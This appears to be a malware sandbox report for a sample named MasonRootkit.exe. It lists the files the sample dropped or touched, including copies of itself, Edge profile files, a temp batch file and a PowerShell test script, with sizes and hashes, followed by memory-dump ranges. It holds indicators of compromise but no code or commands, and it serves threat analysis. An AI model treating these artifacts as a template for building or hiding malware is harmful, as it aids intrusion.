                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\ProgramData\MasonRootkit.exe

                                                                                                                                Filesize

                                                                                                                                596KB

                                                                                                                                MD5

                                                                                                                                bb2fd6c1b233fd2f08a6a43ef860bcb6

                                                                                                                                SHA1

                                                                                                                                1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

                                                                                                                                SHA256

                                                                                                                                8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

                                                                                                                                SHA512

                                                                                                                                2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

                                                                                                                              • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                                                Filesize

                                                                                                                                16KB

                                                                                                                                MD5

                                                                                                                                f28f0a281fe4cf7f90077cb0843f26ff

                                                                                                                                SHA1

                                                                                                                                92cc647993422cff6e23b78bdae911516aa70a80

                                                                                                                                SHA256

                                                                                                                                d027eb219c95dbe966aa2d29c756fe61d99b0b6748f49deffe30c615d810f200

                                                                                                                                SHA512

                                                                                                                                1bae2f296c011e5e163a8581135e40c9a106d070882223678e0763fac334106419262d2fcfffd1803836479f547513dd8db4befd78155b512e4281af895e95de

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log

                                                                                                                                Filesize

                                                                                                                                1KB

                                                                                                                                MD5

                                                                                                                                3982d6d16fd43ae609fd495bb33433a2

                                                                                                                                SHA1

                                                                                                                                6c33cd681fdfd9a844a3128602455a768e348765

                                                                                                                                SHA256

                                                                                                                                9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

                                                                                                                                SHA512

                                                                                                                                4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                Filesize

                                                                                                                                152B

                                                                                                                                MD5

                                                                                                                                ab283f88362e9716dd5c324319272528

                                                                                                                                SHA1

                                                                                                                                84cebc7951a84d497b2c1017095c2c572e3648c4

                                                                                                                                SHA256

                                                                                                                                61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2

                                                                                                                                SHA512

                                                                                                                                66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                Filesize

                                                                                                                                152B

                                                                                                                                MD5

                                                                                                                                7c4ca44d1e99e39917eea18a43ebc075

                                                                                                                                SHA1

                                                                                                                                0497145f8fce19295ace0531eca2fdaac498a0b0

                                                                                                                                SHA256

                                                                                                                                72646db8bc6fed0375343432797ffb8ce0227c98c653cdf4d872aad9d404b2bb

                                                                                                                                SHA512

                                                                                                                                b183c314a76f08a72a3f26ae4b7a2fcb9e97c156c84ca4ab6f2020d1a316ce87f7eca116bfba00f154c302d803fdb8b7cba811c9f495e59b3ef808c70124dc61

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                Filesize

                                                                                                                                152B

                                                                                                                                MD5

                                                                                                                                fffde59525dd5af902ac449748484b15

                                                                                                                                SHA1

                                                                                                                                243968c68b819f03d15b48fc92029bf11e21bedc

                                                                                                                                SHA256

                                                                                                                                26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762

                                                                                                                                SHA512

                                                                                                                                f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                Filesize

                                                                                                                                144B

                                                                                                                                MD5

                                                                                                                                05ea677997351b33f29521d0a6479d5b

                                                                                                                                SHA1

                                                                                                                                25fd28f8aa73bc19ebf54b0f2b8d80239ccbd339

                                                                                                                                SHA256

                                                                                                                                c881f92a1a39cb1c78b162bcc8114238ce661b2a46c7fcc277f82050694ba834

                                                                                                                                SHA512

                                                                                                                                9b0bbe758d0946e8a24380f7383c63229bca83c8732476408d460164256fa040b1af2d0f049d1c3bbef1bcb48d0a0702b683fd84e55aa624ea0489919cd5d65c

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                Filesize

                                                                                                                                461B

                                                                                                                                MD5

                                                                                                                                c845c115b3849b1c050eab8f28eb07ab

                                                                                                                                SHA1

                                                                                                                                1fb94b1526b3fbba6880b16a28b8a87684f0b783

                                                                                                                                SHA256

                                                                                                                                bd752209881ebee81a721e9b5aa78713938ac936451fcc3aeb69bedd6130c3ec

                                                                                                                                SHA512

                                                                                                                                0e5daf569b4329694d1710b6bea43d68c6cca041cdd5abbdba8223cccf97a9106ef3755f4604598553d20ac07fc4f874d106427569ba8c2128fa7b9bd5aed5d7

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                Filesize

                                                                                                                                5KB

                                                                                                                                MD5

                                                                                                                                01c949e10baaf95178b2ee1f40d6b0f0

                                                                                                                                SHA1

                                                                                                                                1bf3829dbc32ef539838a426cce9285a87c25b64

                                                                                                                                SHA256

                                                                                                                                936f69b89aa300530ea8f56f35244cd3a245938d0172741f00cac1b28160c0f2

                                                                                                                                SHA512

                                                                                                                                367477cafb329e4777208a27f1c2e9ecb9c12faaf05adc04f933d1ecc81b6dbd3368768675e53a73c274e474c6be2ea4a6b043601ddf633dc943c5e4b65c81b9

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                Filesize

                                                                                                                                6KB

                                                                                                                                MD5

                                                                                                                                6a58a0387372e8a43a8c5a345664c0b6

                                                                                                                                SHA1

                                                                                                                                bffe90eff2820b198586198b5dd4592be64b5a77

                                                                                                                                SHA256

                                                                                                                                5f83450304725bc7c7f8b840b6297d3158f65be5482cf793ac748c1d353c0b07

                                                                                                                                SHA512

                                                                                                                                7bcaaab146de29f33281964a1d5785bbb21e779c1b99b1da172a23e8dc23869f65a57c5d1fdb42582242e20b10d3876805e855cb0830ad191f28a3bfe2876699

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                Filesize

                                                                                                                                6KB

                                                                                                                                MD5

                                                                                                                                b856d7212a1050f9ad531386b5d86c90

                                                                                                                                SHA1

                                                                                                                                312f44fff2ef43682b22f13f539446a0e8646d2f

                                                                                                                                SHA256

                                                                                                                                715a56a876e55efd02fd9a1b1adc4c65d1f79bc6b509c407c5f32174bab0bc33

                                                                                                                                SHA512

                                                                                                                                d17a9e7c68b467e5707e3f78185a850973fb262140726ed3dea13848a37a5ace635c174990fd3879e69a73a4096d77fc727341bbf84e8458c97067b48a7e3a7e

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                Filesize

                                                                                                                                6KB

                                                                                                                                MD5

                                                                                                                                e6f63120b3fe39b2198ed4463398b5d5

                                                                                                                                SHA1

                                                                                                                                c1aeadf508668dd4ca438c967710d769d5504d2f

                                                                                                                                SHA256

                                                                                                                                5a3c3192274f88dcaa88b83705b9d40274a9cdabc3d122797cb485a97343065b

                                                                                                                                SHA512

                                                                                                                                c2adc3ad62a3d2e761cdcc0124c0cdc03196fe9edf88a6ddebc811abf0d4d69cdffc505a928d1381ad204fbf3f2dd13cf7fce0acc158b55ef534d473c70e4fbf

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                Filesize

                                                                                                                                16B

                                                                                                                                MD5

                                                                                                                                6752a1d65b201c13b62ea44016eb221f

                                                                                                                                SHA1

                                                                                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                SHA256

                                                                                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                SHA512

                                                                                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                                MD5

                                                                                                                                06f5ae158983c94669c2edf9c8ddaa94

                                                                                                                                SHA1

                                                                                                                                9b760b76cbd550d059de0e7ea8a706315784f00b

                                                                                                                                SHA256

                                                                                                                                d75042bffb7cd48ee0b13dc50fd5fe8db394dfa0ff3dae3cb56170fa4530647b

                                                                                                                                SHA512

                                                                                                                                3bedf50a602a78a2a642156d5bb808e414b8d4c2dd44343959342cf349520be5ed830e2e5941757e656555ef84bc291a9dd2a448d0d61b6ae91558b878bcfac6

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                                MD5

                                                                                                                                0b9ad2a807311c626e557f40da77e558

                                                                                                                                SHA1

                                                                                                                                01950b92b935de99f16b2101b677c6be96675341

                                                                                                                                SHA256

                                                                                                                                712388c25c81c96fc1f08543dd85bf30cfa03c211b165e9a9b005860f2c54080

                                                                                                                                SHA512

                                                                                                                                4eb3a7bed5fd854ec88709a99168821674b2d3257f7cdd3c5a9450b183ce26dcaddd60cc3299cf1a96bee2750cbd1f385a10d855eb0fb8b144c031adb8a61d3d

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                                MD5

                                                                                                                                cff64b52e9e5f2377e17cbf5d8325077

                                                                                                                                SHA1

                                                                                                                                cb116e2179de32ba614f40afe58338b0f4d89fbc

                                                                                                                                SHA256

                                                                                                                                08f67d5a534f981aa1d9d1640e7647a081c0b7cd406c217c7af54448459958f9

                                                                                                                                SHA512

                                                                                                                                36c750cced56d78005a211c2f003d4f0998c8431453d36a05db2800df236be3d1dd273e9d30b954c6e2b2e4bc9eb213345232f6147e7ba08154b2d9f10a68e07

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                                MD5

                                                                                                                                b6920129a5cfb1defcdf63a391832347

                                                                                                                                SHA1

                                                                                                                                24870382fefa954c88116d4d78c06a8c27d4bd85

                                                                                                                                SHA256

                                                                                                                                504f63a5f1ab28d1a5bccb8ab8dce1fcf270db0128d96d9e557b9ecdb64d8480

                                                                                                                                SHA512

                                                                                                                                de082ebaf3fb5e0095cb733c3b58d8482e9742dd1fd10598c7e8928b01717762a9e3c729c8580eebc40cd67fb817e14ae054565f78a090ffb370e268a84be82e

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                Filesize

                                                                                                                                11KB

                                                                                                                                MD5

                                                                                                                                d5dee131a31d5ec7a08a698b65e625f0

                                                                                                                                SHA1

                                                                                                                                5fbb923f182f00e6cd6331ae827cd1a3dac3fa29

                                                                                                                                SHA256

                                                                                                                                eb01b231dca4494da703b7cb511293f003c2e68abdaa6aceb4a42f4fcd79c74e

                                                                                                                                SHA512

                                                                                                                                d7f93a656e5b6768801387ae2fc6293879626a3f0a7b9c8f4171012e7c3014f70b67feaf19081178c99814c362e75d1523d3aa3f53c7b6d0e1c1abc39e72800c

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe

                                                                                                                                Filesize

                                                                                                                                612KB

                                                                                                                                MD5

                                                                                                                                5e1eb1a67d40ccae40dee2a037ca6c64

                                                                                                                                SHA1

                                                                                                                                786b54d3d451ea40faeeb20fd30a38744862eeb5

                                                                                                                                SHA256

                                                                                                                                80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

                                                                                                                                SHA512

                                                                                                                                0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bvxsy4h.aqu.ps1

                                                                                                                                Filesize

                                                                                                                                60B

                                                                                                                                MD5

                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                SHA1

                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                SHA256

                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                SHA512

                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp11.tmp.bat

                                                                                                                                Filesize

                                                                                                                                162B

                                                                                                                                MD5

                                                                                                                                c54cf128495e70df4c8437f2a217f887

                                                                                                                                SHA1

                                                                                                                                e874197cc256a7d966a3aac987fa39b6663c0750

                                                                                                                                SHA256

                                                                                                                                fb1e9576b4f2c1bc82baee3aa0dd31abdab1e8c197fd48f7553e08d921058b60

                                                                                                                                SHA512

                                                                                                                                d14c26b352ffa2eb7e427a6ce134b55eb2fb1e0ac08e0a060c9a06f0368a1df697659e05385394b014227358770fc69144a9a430fe4664188c93147f4e8f7c27

                                                                                                                              • C:\Users\Admin\Downloads\Unconfirmed 337803.crdownload

                                                                                                                                Filesize

                                                                                                                                56KB

                                                                                                                                MD5

                                                                                                                                353bbfecde22c1d1eb3e2fe8eb4f8366

                                                                                                                                SHA1

                                                                                                                                115d81abe03fa63e9dcf52946190116e96656da8

                                                                                                                                SHA256

                                                                                                                                228c16c9ef578d27646c15b5fbe057652e35fffad34f0f82230de1c0afc00ce9

                                                                                                                                SHA512

                                                                                                                                1dbe834f385b20d55a86211c2a9011ed9103f1f3d697ca800afa2f75225080c39ea90371b9b2b904b86f6ea7d992a827d18bf995b2e6831664bcb1f4d19357d4

                                                                                                                              • C:\Users\Admin\Videos\Captures\desktop.ini

                                                                                                                                Filesize

                                                                                                                                190B

                                                                                                                                MD5

                                                                                                                                b0d27eaec71f1cd73b015f5ceeb15f9d

                                                                                                                                SHA1

                                                                                                                                62264f8b5c2f5034a1e4143df6e8c787165fbc2f

                                                                                                                                SHA256

                                                                                                                                86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

                                                                                                                                SHA512

                                                                                                                                7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

                                                                                                                              • memory/604-377-0x0000020218630000-0x000002021876E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.2MB

                                                                                                                              • memory/1676-369-0x0000000140000000-0x00000001401A1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.6MB

                                                                                                                              • memory/1676-372-0x00007FFCCAAD0000-0x00007FFCCACC5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/1676-373-0x00007FFCC8F80000-0x00007FFCC903E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/1676-371-0x0000000140000000-0x00000001401A1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.6MB

                                                                                                                              • memory/1676-374-0x0000000140000000-0x00000001401A1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.6MB

                                                                                                                              • memory/3184-347-0x0000000000460000-0x0000000000500000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                640KB

                                                                                                                              • memory/3184-348-0x000000001B050000-0x000000001B0E8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                608KB

                                                                                                                              • memory/4300-204-0x000002B542280000-0x000002B542281000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-178-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-206-0x000002B542390000-0x000002B542391000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-202-0x000002B542270000-0x000002B542271000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-190-0x000002B542070000-0x000002B542071000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-187-0x000002B542130000-0x000002B542131000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-184-0x000002B542140000-0x000002B542141000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-182-0x000002B542130000-0x000002B542131000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-181-0x000002B542140000-0x000002B542141000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-138-0x000002B539E40000-0x000002B539E50000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/4300-180-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-154-0x000002B539F40000-0x000002B539F50000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/4300-170-0x000002B5424F0000-0x000002B5424F1000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-171-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-179-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-205-0x000002B542280000-0x000002B542281000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-177-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-176-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-172-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-173-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-174-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4300-175-0x000002B542510000-0x000002B542511000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4904-310-0x0000000000CF0000-0x0000000000D04000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                80KB

                                                                                                                              • memory/5328-331-0x0000014CF5AA0000-0x0000014CF5FC8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                5.2MB

                                                                                                                              • memory/5328-330-0x0000014CF53A0000-0x0000014CF5562000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.8MB

                                                                                                                              • memory/5328-325-0x0000014CF4E80000-0x0000014CF4EA2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/5352-365-0x00007FFCCAAD0000-0x00007FFCCACC5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/5352-367-0x00007FFCC8F80000-0x00007FFCC903E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/5352-364-0x0000020ADAFB0000-0x0000020ADB04A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                616KB